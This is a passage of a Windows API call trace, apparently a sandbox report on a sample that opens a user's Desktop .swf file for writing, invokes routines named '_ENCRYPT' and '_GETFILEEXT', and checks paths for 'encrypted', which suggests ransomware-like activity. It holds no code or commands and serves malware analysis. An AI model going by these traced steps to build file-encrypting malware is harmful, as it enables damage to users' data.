(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.739] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.741] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.741] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\n0tvrnehfm.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.742] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.743] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.743] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.743] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.743] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.743] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.743] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.744] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.744] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.744] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.744] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.744] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.744] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.744] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.744] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.744] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd98fee0, ftCreationTime.dwHighDateTime=0x1d5b768, ftLastAccessTime.dwLowDateTime=0x54d03240, ftLastAccessTime.dwHighDateTime=0x1d5c378, ftLastWriteTime.dwLowDateTime=0x54d03240, ftLastWriteTime.dwHighDateTime=0x1d5c378, nFileSizeHigh=0x0, nFileSizeLow=0xd984, dwReserved0=0x0, dwReserved1=0x777648, cFileName="n0TvRnehFM.swf", cAlternateFileName="N0TVRN~1.SWF")) returned 0x7c20c0 [0031.744] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.744] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.744] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd98fee0, ftCreationTime.dwHighDateTime=0x1d5b768, ftLastAccessTime.dwLowDateTime=0x54d03240, ftLastAccessTime.dwHighDateTime=0x1d5c378, ftLastWriteTime.dwLowDateTime=0x54d03240, ftLastWriteTime.dwHighDateTime=0x1d5c378, nFileSizeHigh=0x0, nFileSizeLow=0xd984, dwReserved0=0x0, dwReserved1=0x777648, cFileName="n0TvRnehFM.swf", cAlternateFileName="N0TVRN~1.SWF")) returned 0x7c20c0 [0031.744] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.744] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS 